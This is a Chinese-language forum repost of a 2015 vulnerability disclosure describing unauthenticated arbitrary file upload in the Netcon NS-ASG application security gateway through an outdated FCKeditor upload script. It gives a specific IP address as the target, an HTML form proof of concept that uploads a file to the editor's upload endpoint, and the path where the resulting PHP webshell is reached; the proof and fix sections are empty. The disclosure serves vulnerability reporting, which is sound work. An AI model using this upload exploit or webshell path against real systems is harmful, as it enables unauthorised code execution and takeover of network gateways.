中神通公司技术论坛 - Powered by Discuz! Board

标题: 网康NS-ASG应用安全网关任意文件上传（无需登录） [打印本页]

作者: linda 时间: 2016-1-6 16:33 标题: 网康NS-ASG应用安全网关任意文件上传（无需登录）

漏洞标题网康NS-ASG应用安全网关任意文件上传（无需登录）
相关厂商网康科技
漏洞作者 menmen519
提交时间 2015-01-03 00:16
公开时间 2015-04-03 00:18
漏洞类型文件上传导致任意代码执行
危害等级高
自评Rank 20
漏洞状态厂商已经确认
Tags标签

漏洞详情发现存在fckeditor:
https://122.226.150.69/admin/fckeditor/editor/filemanager/upload/php/upload.php
这个版本比较低2.4.3，直接构造poc:
<form enctype="multipart/form-data" action="https://122.226.150.69/admin/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">
<input name="NewFile" type="file">
<input type="submit" value="submit">
</form>
然后访问:
https://122.226.150.69/vpnweb/userfiles/media/2011.php
直接shell大马

漏洞证明：
修复方案：
版权声明：转载请注明来源 menmen519@乌云
原文：http://www.secpulse.com/archives/30586.html

欢迎光临中神通公司技术论坛 (http://trustcomputing.com.cn/bbs/)